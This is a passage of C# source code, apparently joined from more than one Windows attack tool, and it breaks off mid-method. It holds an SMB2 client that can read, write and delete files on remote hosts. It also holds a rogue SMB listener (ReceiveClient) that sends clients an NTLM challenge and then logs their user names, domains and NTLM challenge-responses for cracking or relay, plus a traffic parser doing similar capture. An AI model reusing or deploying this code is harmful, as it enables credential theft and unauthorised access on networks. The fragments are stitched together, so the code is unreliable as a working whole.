public static byte[] GetBytes(object smb2Command)
{
NetBIOSSessionService netBIOSSessionService = new NetBIOSSessionService();
SMB2Header smb2Header = new SMB2Header();
return(GetBytes(netBIOSSessionService, smb2Header, smb2Command));
}
public static byte[] GetBytes(NetBIOSSessionService netBIOSSessionService, SMB2Header smb2Header, object smb2Command)
{
byte[] headerData = smb2Header.GetBytes();
byte[] commandData = new byte[0];
switch (smb2Header.Command)
{
case 0:
{
SMB2NegotiateResponse command = (SMB2NegotiateResponse)smb2Command;
commandData = command.GetBytes();
}
break;
case 1:
{
SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)smb2Command;
commandData = command.GetBytes();
}
break;
}
netBIOSSessionService.Length = (ushort)(commandData.Length + 64);
byte[] netbiosData = netBIOSSessionService.GetBytes();
return(Utilities.BlockCopy(netbiosData, headerData, commandData));
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
public void NegotiateSMB2()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x00, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x00, 0x00 });
header.SetMessageID(messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
Byte[] bHeader = header.GetHeader();
SMB2NegotiateProtocolRequest protocols = new SMB2NegotiateProtocolRequest();
Byte[] bData = protocols.GetProtocols();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(bSessionService, bHeader);
send = Combine.combine(send, bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean LogoffRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x02, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2SessionLogoffRequest logoffRequest = new SMB2SessionLogoffRequest();
Byte[] bData = logoffRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
return true;
else
return false;
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal void IoctlRequest(String share)
{
treeId = new Byte[] { 0x01, 0x00, 0x00, 0x00 };
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x0b, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2IoctlRequest ioctlRequest = new SMB2IoctlRequest();
ioctlRequest.SetFileName(share);
Byte[] bData = ioctlRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
treeId = new Byte[] { 0x00, 0x00, 0x00, 0x00 };
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal void NTLMSSPNegotiate()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x01, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
Byte[] bHeader = header.GetHeader();
SMB2NTLMSSPNegotiate NTLMSSPNegotiate = new SMB2NTLMSSPNegotiate(version);
NTLMSSPNegotiate.SetFlags(flags);
Byte[] bNegotiate = NTLMSSPNegotiate.GetSMB2NTLMSSPNegotiate();
SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
sessionSetup.SetSecurityBlob(bNegotiate);
Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(bSessionService, bHeader);
send = Combine.combine(send, bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private Int32 _ReadRequest2(Int64 offset, Int32 length)
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x08, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
header.SetChainOffset(new Byte[] { 0x00, 0x00, 0x00, 0x00 });
SMB2ReadRequest readRequest = new SMB2ReadRequest();
readRequest.SetGuidHandleFile(guidFileHandle);
readRequest.SetLength(BitConverter.GetBytes(length));
readRequest.SetOffset(BitConverter.GetBytes(offset));
Byte[] bData = readRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
Combine combine = new Combine();
Int32 streamLength = 0;
Byte[] dataRecieved = new Byte[0];
do
{
Byte[] part = new Byte[65619];
Int32 partLength = streamSocket.Read(part, 0, part.Length);
streamLength += partLength;
combine.Extend(part.Take(partLength).ToArray());
}while (streamLength < length);
Int32 padding = length < 65535 ? 0 : 54;
recieve = combine.Retrieve().Skip(84).Take(streamLength - 84 - padding).ToArray();
binaryWriter.Write(recieve);
binaryWriter.Flush();
return(recieve.Length);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean SetInfoRequest(String sourceFilePath, String destination)
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x11, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2SetInfo setInfo = new SMB2SetInfo();
setInfo.SetClass(new Byte[] { 0x01 });
setInfo.SetInfoLevel(new Byte[] { 0x14 });
setInfo.SetGUIDHandleFile(guidFileHandle);
//This may need to be coverted to int32
using (FileStream fileStream = new FileStream(Path.GetFullPath(sourceFilePath), FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
{
using (BinaryReader binaryReader = new BinaryReader(fileStream))
{
setInfo.SetBuffer(BitConverter.GetBytes(binaryReader.BaseStream.Length));
}
}
setInfo.SetGUIDHandleFile(guidFileHandle);
Byte[] bData = setInfo.GetRequest();
header.SetChainOffset(bData.Length);
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData));
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
treeId = recieve.Skip(40).Take(4).ToArray();
return(true);
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal override Boolean ReadRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x08, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
header.SetChainOffset(new Byte[] { 0x00, 0x00, 0x00, 0x00 });
SMB2ReadRequest readRequest = new SMB2ReadRequest();
readRequest.SetGuidHandleFile(guidFileHandle);
readRequest.SetLength(BitConverter.GetBytes(4096));
readRequest.SetOffset(BitConverter.GetBytes((Int64)0));
Byte[] bData = readRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
Int16 i = 0;
while (smbClient.Available < 8192 && i < 10)
{
System.Threading.Thread.Sleep(100);
i++;
}
Int32 streamLength = streamSocket.Read(recieve, 0, recieve.Length);
Byte[] data = recieve.Skip(84).Take((Int32)streamLength).ToArray();
GetStatus(recieve.Skip(12).Take(4).ToArray());
return(true);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
public void NegotiateSMB()
{
SMBHeader smbHeader = new SMBHeader();
smbHeader.SetCommand(new Byte[] { 0x72 });
smbHeader.SetFlags(new Byte[] { 0x18 });
smbHeader.SetFlags2(new Byte[] { 0x01, 0x48 });
smbHeader.SetProcessID(processId.Take(2).ToArray());
smbHeader.SetUserID(new Byte[] { 0x00, 0x00 });
Byte[] bHeader = smbHeader.GetHeader();
SMBNegotiateProtocolRequest protocols = new SMBNegotiateProtocolRequest();
Byte[] bData = protocols.GetProtocols();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(bSessionService, bHeader);
send = Combine.combine(send, bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
Byte[] recieve = new Byte[81920];
streamSocket.Read(recieve, 0, recieve.Length);
Byte[] response = recieve.Skip(5).Take(4).ToArray();
if (response == new Byte[] { 0xff, 0x53, 0x4d, 0x42 })
{
Console.WriteLine("[-] SMB1 is not supported");
return;
}
version = "SMB2";
Byte[] keyLength = { 0x00, 0x00 };
if (recieve.Skip(70).Take(1).ToArray().SequenceEqual(new Byte[] { 0x03 }))
{
Console.WriteLine("[*] SMB Signing Required");
signing = true;
flags = new Byte[] { 0x15, 0x82, 0x08, 0xa0 };
}
else
{
signing = false;
flags = new Byte[] { 0x05, 0x80, 0x08, 0xa0 };
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal override Boolean CreateRequest(String folder)
{
treeId = recieve.Skip(40).Take(4).ToArray();
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x05, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2CreateRequest createRequest = new SMB2CreateRequest();
if (!String.IsNullOrEmpty(folder))
{
createRequest.SetFileName(folder);
}
createRequest.SetExtraInfo(1, 0);
createRequest.SetCreateOptions(new Byte[] { 0x00, 0x00, 0x20, 0x00 });
createRequest.SetAccessMask(new Byte[] { 0x89, 0x00, 0x12, 0x00 });
createRequest.SetShareAccess(new Byte[] { 0x05, 0x00, 0x00, 0x00 });
Byte[] bData = createRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
guidFileHandle = recieve.Skip(0x0084).Take(16).ToArray();
return(true);
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean SetInfoRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x11, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2SetInfo setInfo = new SMB2SetInfo();
setInfo.SetClass(new Byte[] { 0x01 });
setInfo.SetInfoLevel(new Byte[] { 0x0d });
setInfo.SetGUIDHandleFile(guidFileHandle);
setInfo.SetBuffer(new Byte[] { 0x01, 0x00, 0x00, 0x00 });
Byte[] bData = setInfo.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData));
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatusSilent(recieve.Skip(12).Take(4).ToArray()))
{
Console.WriteLine("[+] File Deleted");
return(true);
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private Boolean Send(Byte[] bHeader, Byte[] bData)
{
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
return(true);
}
else
{
return(false);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal virtual Boolean InfoRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x10, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2GetInfo getInfo = new SMB2GetInfo();
getInfo.SetClass(new Byte[] { 0x02 });
getInfo.SetInfoLevel(new Byte[] { 0x05 });
getInfo.SetMaxResponseSize(new Byte[] { 0x50, 0x00, 0x00, 0x00 });
getInfo.SetGUIDHandleFile(recieve.Skip(132).Take(16).ToArray());
Byte[] bData = getInfo.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
return true;
else
return false;
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private void _WriteRequest(Byte[] buffer, Int64 offset)
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x09, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2WriteRequest writeRequest = new SMB2WriteRequest();
writeRequest.SetGuidHandleFile(guidFileHandle);
writeRequest.SetBuffer(buffer);
writeRequest.SetOffset(offset);
Byte[] bData = writeRequest.GetRequest();
header.SetChainOffset(bData.Length);
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData));
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean CloseRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x06, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2CloseRequest closeRequest = new SMB2CloseRequest();
closeRequest.SetFileID(guidFileHandle);
Byte[] bData = closeRequest.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
else
{
header.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x00 });
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
return GetStatusSilent(recieve.Skip(12).Take(4).ToArray());
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean GetInfoRequest()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x10, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2GetInfo getInfo = new SMB2GetInfo();
getInfo.SetClass(new Byte[] { 0x02 });
getInfo.SetInfoLevel(new Byte[] { 0x01 });
getInfo.SetMaxResponseSize(new Byte[] { 0x58, 0x00, 0x00, 0x00 });
getInfo.SetGetInfoInputOffset(new Byte[] { 0x00, 0x00 });
getInfo.SetGUIDHandleFile(guidFileHandle);
Byte[] bData = getInfo.GetRequest();
header.SetChainOffset(bData.Length);
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
SMB2Header header2 = new SMB2Header();
header2.SetCommand(new Byte[] { 0x10, 0x00 });
header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header2.SetMessageID(++messageId);
header2.SetProcessID(processId);
header2.SetTreeId(treeId);
header2.SetSessionID(sessionId);
header2.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x04 });
SMB2GetInfo getInfo2 = new SMB2GetInfo();
getInfo2.SetClass(new Byte[] { 0x02 });
getInfo2.SetInfoLevel(new Byte[] { 0x05 });
getInfo2.SetMaxResponseSize(new Byte[] { 0x50, 0x00, 0x00, 0x00 });
getInfo2.SetGetInfoInputOffset(new Byte[] { 0x00, 0x00 });
getInfo2.SetGUIDHandleFile(guidFileHandle);
Byte[] bData2 = getInfo2.GetRequest();
if (signing)
{
header2.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header2.SetSignature(sessionKey, ref bData2);
}
Byte[] bHeader2 = header2.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length);
sessionService.SetDataLength(bData.Length + bData2.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Combine combine = new Combine();
combine.Extend(bHeader);
combine.Extend(bData);
combine.Extend(bHeader2);
combine.Extend(bData2);
Byte[] bSend = Combine.combine(bSessionService, combine.Retrieve());
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
return(true);
}
return(false);
}
internal void ReceiveClient(object parameters)
{
object[] parameterArray = parameters as object[];
Guid serverGuid = (Guid)parameterArray[0];
TcpClient tcpClient = (TcpClient)parameterArray[1];
int port = (int)parameterArray[2];
NetworkStream tcpStream = tcpClient.GetStream();
bool isSMB2;
string challenge = "";
string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString();
string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString();
string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString();
try
{
while (tcpClient.Connected && isRunning)
{
byte[] requestData = new byte[4096];
do
{
Thread.Sleep(100);
}while (!tcpStream.DataAvailable && tcpClient.Connected);
while (tcpStream.DataAvailable)
{
tcpStream.Read(requestData, 0, requestData.Length);
}
NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData);
SMBHelper smbHelper = new SMBHelper();
if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff)
{
int sessionServiceIndex = 0;
if (requestNetBIOSSessionService.Type == 0)
{
sessionServiceIndex = 4;
}
byte[] sendBuffer = new byte[0];
SMBHeader requestSMBHeader = new SMBHeader();
SMB2Header requestSMB2Header = new SMB2Header();
smbHelper.ReadBytes(requestData, sessionServiceIndex);
if (smbHelper.Protocol[0] == 0xfe)
{
isSMB2 = true;
requestSMB2Header.ReadBytes(requestData, sessionServiceIndex);
}
else
{
isSMB2 = false;
requestSMBHeader.ReadBytes(requestData, sessionServiceIndex);
}
if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0))
{
SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex);
SMB2Header responseSMB2Header = new SMB2Header();
SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse();
if (!isSMB2)
{
smb2NegotiateResponse.DialectRivision = new byte[2] {
0xff, 0x02
};
smb2NegotiateResponse.Capabilities = new byte[4] {
0x07, 0x00, 0x00, 0x00
};
OutputNegotiation("SMB1", listenerPort, clientIP, clientPort);
}
else if (isSMB2)
{
responseSMB2Header.MessageId = requestSMB2Header.MessageId;
if (smb2NegotiatelRequest.GetMaxDialect() == 0x311)
{
smb2NegotiateResponse.DialectRivision = new byte[2] {
0x11, 0x03
};
smb2NegotiateResponse.NegotiateContextCount = 3;
smb2NegotiateResponse.Capabilities = new byte[4] {
0x2f, 0x00, 0x00, 0x00
};
smb2NegotiateResponse.NegotiateContextOffset = 448;
smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" });
OutputNegotiation("SMB3", listenerPort, clientIP, clientPort);
}
else
{
smb2NegotiateResponse.DialectRivision = new byte[2] {
0x10, 0x02
};
smb2NegotiateResponse.Capabilities = new byte[4] {
0x07, 0x00, 0x00, 0x00
};
OutputNegotiation("SMB2", listenerPort, clientIP, clientPort);
}
responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix
}
smb2NegotiateResponse.EncodeBuffer();
smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray();
sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse);
}
else if (isSMB2 && requestSMB2Header.Command > 0)
{
switch (requestSMB2Header.Command)
{
case 1:
{
SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex);
NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true);
if (requestNTLMNegotiate.MessageType == 1)
{
SMB2Header responseSMB2Header = new SMB2Header();
SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse();
responseSMB2Header.Status = new byte[4] {
0x16, 0x00, 0x00, 0xc0
};
responseSMB2Header.CreditCharge = 1;
responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2;
responseSMB2Header.Command = 1;
responseSMB2Header.Flags = new byte[4] {
0x11, 0x00, 0x00, 0x00
};
responseSMB2Header.MessageId = requestSMB2Header.MessageId;
responseSMB2Header.SessionId = BitConverter.GetBytes(smb2Session);
smb2Session++;
smb2SessionSetupResponse.Pack(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, out byte[] challengeData);
sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse);
challenge = BitConverter.ToString(challengeData).Replace("-", "");
OutputChallenge(listenerPort, clientIP, clientPort, challenge);
}
else if (requestNTLMNegotiate.MessageType == 3)
{
NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true);
string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName);
string user = Encoding.Unicode.GetString(ntlmResponse.UserName);
string host = Encoding.Unicode.GetString(ntlmResponse.Workstation);
string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", "");
string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", "");
OutputNTLM("SMB", listenerPort, clientIP, clientPort, user, domain, host, challenge, response, lmResponse);
SMB2Header responseSMB2Header = new SMB2Header();
SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse();
responseSMB2Header.Status = new byte[4] {
0x6d, 0x00, 0x00, 0xc0
};
//responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 };
//responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied
responseSMB2Header.CreditCharge = 1;
responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2;
responseSMB2Header.Command = 1;
responseSMB2Header.Flags = new byte[4] {
0x11, 0x00, 0x00, 0x00
};
responseSMB2Header.MessageId = requestSMB2Header.MessageId;
responseSMB2Header.SessionId = requestSMB2Header.SessionId;
smb2SessionSetupResponse.SecurityBufferOffset = 0;
sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse);
}
}
break;
}
}
tcpStream.Write(sendBuffer, 0, sendBuffer.Length);
tcpStream.Flush();
}
else
{
tcpClient.Close();
}
}
}
catch (Exception ex)
{
OutputError(ex, port);
}
}
internal static void ProcessSMB(byte[] data, string clientIP, string listenerIP, string clientPort, string listenerPort)
{
if (data.Length >= 4)
{
NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(data);
SMBHeader smbHeader = new SMBHeader();
SMB2Header smb2Header = new SMB2Header();
int sessionServiceIndex = 0;
if (requestNetBIOSSessionService.Type == 0)
{
sessionServiceIndex = 4;
}
SMBHelper helper = new SMBHelper(data, sessionServiceIndex);
string session;
string challenge;
if (helper.Protocol[0] == 0xff)
{
smbHeader.ReadBytes(data, sessionServiceIndex);
string flags = Convert.ToString(smbHeader.Flags, 2).PadLeft(8, '0');
switch (smbHeader.Command)
{
case 0x72:
{
if (String.Equals(flags.Substring(0, 1), "0"))
{
Output.Queue(String.Format("[.] [{0}] SMB1({1}) negotiation request detected from {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort));
}
}
break;
case 0x73:
{
if (String.Equals(flags.Substring(0, 1), "1"))
{
SMBCOMSessionSetupAndXResponse smbCOMSessionSetupAndXResponse = new SMBCOMSessionSetupAndXResponse(data, 32 + sessionServiceIndex);
if (smbCOMSessionSetupAndXResponse.SecurityBlobLength > 0)
{
if (!BitConverter.ToString(smbCOMSessionSetupAndXResponse.SecurityBlob).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos
{
